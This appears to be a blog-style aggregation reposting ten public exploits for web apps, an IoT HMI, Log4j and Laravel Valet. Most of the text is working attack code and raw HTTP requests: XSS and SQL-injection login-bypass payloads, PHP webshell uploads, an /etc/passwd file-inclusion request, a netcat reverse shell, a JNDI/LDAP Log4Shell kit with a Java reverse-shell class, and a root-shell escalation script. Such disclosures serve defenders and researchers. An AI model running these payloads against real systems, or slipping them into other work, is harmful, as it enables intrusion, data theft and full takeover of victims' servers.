
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS) # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: ?page=view_task&id=2 Technical description: A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. xss-1: 1) Navigate to http://localhost/?page=view_task&id=2 and click "edit task" 2) Insert your payload in the "title" and "Task Description" parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> --- POST /Actions.php?a=save_task HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 312 Origin: http://localhost Connection: close Referer: http://localhost/?page=tasks Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E xss-2 1) Navigate to http://localhost.com/?page=manage_account 2) Insert your payload in the "full name" or "contact" or "email"
parameter Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> -- POST /Actions.php?a=update_credentials_employee HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384 Content-Length: 1613 Origin: http://localhost Connection: close Referer: http://localhost/?page=manage_account Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="fullname" John D Smith -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="gender" Male -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="dob" 1997-06-23 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="contact" 098123456789"><img src=# onerror=alert(123)> -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" [email protected] -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="address" Sample Address -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="department_id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" [email protected] -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="password" -----------------------------27882107026209045483167935384 
Content-Disposition: form-data; name="old_password" -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream -----------------------------27882107026209045483167935384--
  2. # Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: Actions.php # Vulnerable parameters: "username" Technical description: An SQL Injection vulnerability exists in the Employees Daily Task Management System admin login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 123'+or+1=1+--+- --- POST /Actions.php?a=employee_login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 43 Origin: http://edtms.com Connection: close Referer: http://edtms.com/login.php Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl email=admin'+or+1=1+--+-&password=123123213 response HTTP/1.1 200 OK Date: Wed, 10 Nov 2021 02:23:38 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/8.0.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48 {"status":"success","msg":"Login successfully."} ---
  3. # Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE) # Google Dork: intext:"Current Available Openings, Recently Posted Jobs" # Date: 21/09/2021 # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar # Vendor Homepage: https://www.opencats.org/ # Software Link: https://github.com/opencats/OpenCATS # Version: <=0.9.4 Countach # Tested on: Debian, CentOS, Windows Server #!/bin/bash if [ $# -eq 0 ] then echo "Usage: $0 <target URL>" exit fi # if a payload doesn't work, try another payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>' #payload='GIF87a<?php echo `$_REQUEST[0]`; ?>' #payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>' target=$1 green="\033[0;32m" red="\033[0;31m" reset="\033[0m" #====================== Functions rev() { while true do echo -n -e "\n$ " read cmd curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d" done } upload() { curl -skL $1/$2 \ -H "Connection: close" \ -F resumeFile=@"$3;type=application/x-php" \ -F ID="$firstJb" \ -F candidateID="-1" \ -F applyToJobSubAction="resumeLoad" \ --compressed \ --insecure } getVersion() { ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}" return 0 fi fi echo -e "${green}[*] Version detected: $ver${reset}" } writePayload(){ tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php" file=`basename $tmpfile` echo "$1" > $tmpfile } banner(){ echo 
"IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d echo -e "\n" } #====================== banner echo "[*] Attacking target $target" echo "[*] Checking CATS version..." getVersion $target #exit echo "[*] Creating temp file with payload..." writePayload "$payload" #exit echo "[*] Checking active jobs..." jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'` firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] No active jobs found.${reset}" echo "[*] Trying another path..." jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] Couldn't find any active job.${reset}" exit fi fi firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}" echo "[*] Sending payload..." req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}" echo "[*] Checking by another method..." sed -i "s/GIF87a//" $tmpfile req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't upload payload...${reset}" exit fi fi echo -e "${green}[+] Payload $file uploaded!" echo "[*] Deleting created temp file..." 
rm $tmpfile echo "[*] Checking shell..." check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file") if `echo $check | grep -q "0x7359"` then echo -e "${green}[+] Got shell! :D${reset}" curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d" rev $target/upload/careerportaladd/$file else echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}" fi
  4. # Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: fuzzyap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/enquiry_category # Vulnerable Parameters: "category" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/admin/enquiry_category 2) Insert your payload in the "category" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)> --- POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------151631281127875309002088019539 Content-Length: 490 Origin: http://localhost Connection: close Referer: http://localhost/admin/enquiry_category Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63; ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0 Upgrade-Insecure-Requests: 1 -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="category" This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)> -----------------------------151631281127875309002088019539 
Content-Disposition: form-data; name="purpose" Payment -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="whom" Tutorial -----------------------------151631281127875309002088019539-- --- Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) Insert your payload in the "name" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert('xss')> --- POST /admin/manage_profile/update HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------13285163425854907563979323722 Content-Length: 519 Origin: http://localhost Connection: close Referer: http://localhost/admin/manage_profile Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16 Upgrade-Insecure-Requests: 1 -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="name" Administrator"><img src=# onerror=alert(document.cookie)> -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="email" [email protected] -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------13285163425854907563979323722-- ---
  5. # Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE) # Exploit Author: fuuzap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/examQuestion Technical description: An unrestricted file upload vulnerability exists in the Free school management software v1.0. An attacker can leverage this vulnerability in order to get a remote code execution on the affected web server. Once a php webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it gets saved into the /uploads/exam_question/ directory, and is accessible by all users. The attacker can gain remote code execution on the web server. Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) click "ADD NEW QUESTION PAPER" and edit base information 3) upload a php webshell containing "<?php system($_GET["cmd"]); ?>" in the Field "upload Drag and drop a file here or click" 4) Click "save" 5) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then the php code executes Proof of concept (Poc): The following payload will allow you to run the javascript - <?php system($_GET["cmd"]); ?> --- POST /admin/examQuestion/create HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------183813756938980137172117669544 Content-Length: 1331 Origin: http://localhost Connection: close Referer: http://localhost/admin/examQuestion Cookie: 
ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q Upgrade-Insecure-Requests: 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="name" test4 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="class_id" 2 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="subject_id" 5 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="timestamp" 2021-12-08 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="teacher_id" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_type" txt -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="status" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="description" 123123 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="_wysihtml5_mode" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_name"; filename="cmd.php" Content-Type: application/octet-stream <?php eval($_GET["cmd"]); ?> -----------------------------183813756938980137172117669544-- ---
  6. # Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI) # Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" # Date: 11/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: N/A # Version: V2.0 # Tested on: Nginx NVRDVRIPC Web Server Proof of Concept: GET /language/lang HTTP/1.1 Referer: http://example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: VulnIP Connection: Keep-alive
  7. # Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware < 4.1 # CVE: CVE-2021-43936 # Tested on: WebHMI Firmware 4.0.7475 #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import subprocess banner = pyfiglet.figlet_format("CVE-2021-43936") print(banner) print('Exploit for CVE-2021-43936') print('For: WebHMI Firmware < 4.1') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" headers_login = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Uploading cmd.php file...') files = { 'file': ('cmd.php', payload, 
'application/x-php') } r4 = r.post(url + '/files.php', files=files, cookies=login_cookies) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Executing reverse shell...') print('[*] Watchout for shell! :)') r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies) if (r5.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
  8. # Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure # Date: 12/12/2021 # Exploit Author: leonjza # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Version: <= 2.14.1 # CVE: CVE-2021-44228 #!/usr/bin/env python3 # Pure python ENV variable leak PoC for CVE-2021-44228 # Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 # # 2021 @leonjza import argparse import socketserver import threading import time import requests LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a' class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): def handle(self) -> None: print(f' i| new connection from {self.client_address[0]}') sock = self.request sock.recv(1024) sock.sendall(LDAP_HEADER) data = sock.recv(1024) data = data[9:] # strip header # example response # # ('Java version 11.0.13\n' # '\x01\x00\n' # '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b' # 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2') data = data.decode(errors='ignore').split('\n')[0] print(f' v| extracted value: {data}') class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass def main(): parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc ' '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)') parser.add_argument('--target', '-t', required=True, help='target uri') parser.add_argument('--listen-host', default='0.0.0.0', help='exploit server host to listen on (default: 127.0.0.1)') parser.add_argument('--listen-port', '-lp', default=8888, help='exploit server port to listen on (default: 8888)') parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1', help='host where (this) exploit server is reachable') parser.add_argument('--leak', '-l', default='${java:version}', help='value to leak. 
' 'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 ' '(default: ${java:version})') args = parser.parse_args() print(f' i| starting server on {args.listen_host}:{args.listen_port}') server = ThreadedTCPServer((args.listen_host, args.listen_port), ThreadedTCPRequestHandler) serv_thread = threading.Thread(target=server.serve_forever) serv_thread.daemon = True serv_thread.start() time.sleep(1) print(f' i| server started') payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' print(f' i| sending exploit payload {payload} to {args.target}') try: r = requests.get(args.target, headers={'User-Agent': payload}) print(f' i| response status code: {r.status_code}') print(f' i| response: {r.text}') except Exception as e: print(f' e| failed to make request: {e}') finally: server.shutdown() server.server_close() if __name__ == '__main__': main()
  9. # Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) # Exploit Author: leonjza # Vendor Homepage: https://laravel.com/docs/8.x/valet # Version: v1.1.4 to v2.0.3 #!/usr/bin/env python2 # Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS) # February 2017 - @leonjza # Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes. # Reintroduced in v2.0.7 via the 'trust' command again. # This bug got introduced when the sudoers files got added around # commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1]. # Effectively, when the valet command is installed, composer will symlink [2] # the `valet` command to /usr/local/bin. This 'command' is writable by the user # that installed it. # # ~ $ ls -lah $(which valet) # lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet # Running `valet install`, will start the install [3] routine. The very first action # taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which # will prompt the user for the sudo password in the command line. From here (and in fact # from any point where the valet tool uses sudo) the command can execute further commands # as root without any further interaction needed by the user. # With this 'sudo' access, the installer does it thing, and eventually installs two new # sudoers rules for homebrew[5] and valet[6]. # ~ $ cat /etc/sudoers.d/* # Cmnd_Alias BREW = /usr/local/bin/brew * # %admin ALL=(root) NOPASSWD: BREW # Cmnd_Alias VALET = /usr/local/bin/valet * # %admin ALL=(root) NOPASSWD: VALET # The problem with the sudoers rules now is the fact that a user controlled script # (rememeber the valet command is writable to my user?) is allowed to be run with # root privileges. More conveniently, without a password. So, to trivially privesc # using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D # Or, use this lame script you lazy sod. 
# # ~ $ sudo -k # ~ $ python escalate.py # * Shell written. Dropping into root shell # bash-3.2# whoami # root # bash-3.2# exit # exit # * Cleaning up POC from valet command # [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40 # [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39 # [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50 # [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133 # [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177 # [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46 import os import subprocess MIN_VERSION = "1.1.4" MAX_VERSION = "2.0.3" POC = "/bin/bash; exit;\n" def run_shit_get_output(shit_to_run): return subprocess.Popen(shit_to_run, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) def version_tuple(v): return tuple(map(int, (v.split(".")))) def get_valet(): p = run_shit_get_output('which valet') lines = ''.join(p.stdout.readlines()) if 'bin/valet' in lines: return lines.strip() return None def get_valet_version(valet_location): p = run_shit_get_output(valet_location) v = p.stdout.read(25) return v.split("\n")[0].split(" ")[2] def can_write_to_valet(valet_location): return os.access(valet_location, os.W_OK) def cleanup_poc_from_command(command_location): with open(command_location, 'r') as vc: command_contents = vc.readlines() if command_contents[1] == POC: print('* Cleaning up POC from valet command') command_contents.pop(1) with open(command_location, 'w') as vc: vc.write(''.join(command_contents)) return print('* Could not cleanup the valet command. Check it out manually!') return def main(): valet_command = get_valet() if not valet_command: print(' * The valet command could not be found. 
Bailing!') return # get the content so we can check if we already pwnd it with open(valet_command, 'r') as vc: command_contents = vc.readlines() # check that we havent already popped this thing if command_contents[1] == POC: print('* Looks like you already pwnd this. Dropping into shell anyways.') os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) return current_version = get_valet_version(valet_command) # ensure we have a valid, exploitable version if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \ or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)): print(' * Valet version {0} does not have this bug!'.format(current_version)) return # check that we can write if not can_write_to_valet(valet_command): print('* Cant write to valet command at {0}. Bailing!'.format(valet_command)) return # drop the poc line and write the new one command_contents.insert(1, POC) with open(valet_command, 'w') as vc: vc.write(''.join(command_contents)) print('* Shell written. Dropping into root shell') # drop in the root shell :D os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) if __name__ == '__main__': main()
  10. # Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE) # Date: 11/12/2021 # Exploit Authors: kozmer, z9fr, svmorris # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Software Link: https://github.com/apache/logging-log4j2 # Version: versions 2.0-beta-9 and 2.14.1. # Tested on: Linux # CVE: CVE-2021-44228 # Github repo: https://github.com/kozmer/log4j-shell-poc import subprocess import sys import argparse from colorama import Fore, init import subprocess import threading from http.server import HTTPServer, SimpleHTTPRequestHandler init(autoreset=True) def listToString(s): str1 = "" try: for ele in s: str1 += ele return str1 except Exception as ex: parser.print_help() sys.exit() def payload(userip , webport , lport): genExploit = ( """ import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="%s"; int port=%s; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } """) % (userip, lport) # writing the exploit to Exploit.java file try: f = open("Exploit.java", "w") f.write(genExploit) f.close() print(Fore.GREEN + '[+] Exploit java class created success') except Exception as e: print(Fore.RED + f'[-] Something went wrong {e.toString()}') checkJavaAvailible() print(Fore.GREEN + '[+] Setting up fake LDAP server\n') # create the LDAP server on new thread t1 = threading.Thread(target=createLdapServer, args=(userip,webport)) t1.start() # start the web 
server httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler) httpd.serve_forever() def checkJavaAvailible(): javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) if(javaver != 0): print(Fore.RED + '[-] Java is not installed inside the repository ') sys.exit() def createLdapServer(userip, lport): sendme = ("${jndi:ldap://%s:1389/a}") % (userip) print(Fore.GREEN +"[+] Send me: "+sendme+"\n") subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"]) url = " http://{}:{}/#Exploit".format (userip, lport) subprocess.run(["./jdk1.8.0_20/bin/java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url]) def header(): print(Fore.BLUE+""" [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc """) if __name__ == "__main__": header() try: parser = argparse.ArgumentParser(description='please enter the values ') parser.add_argument('--userip', metavar='userip', type=str, nargs='+', help='Enter IP for LDAPRefServer & Shell') parser.add_argument('--webport', metavar='webport', type=str, nargs='+', help='listener port for HTTP port') parser.add_argument('--lport', metavar='lport', type=str, nargs='+', help='Netcat Port') args = parser.parse_args() #print(args.userip) payload(listToString(args.userip), listToString(args.webport), listToString(args.lport)) except KeyboardInterrupt: print(Fore.RED + "user interupted the program.") sys.exit(0)
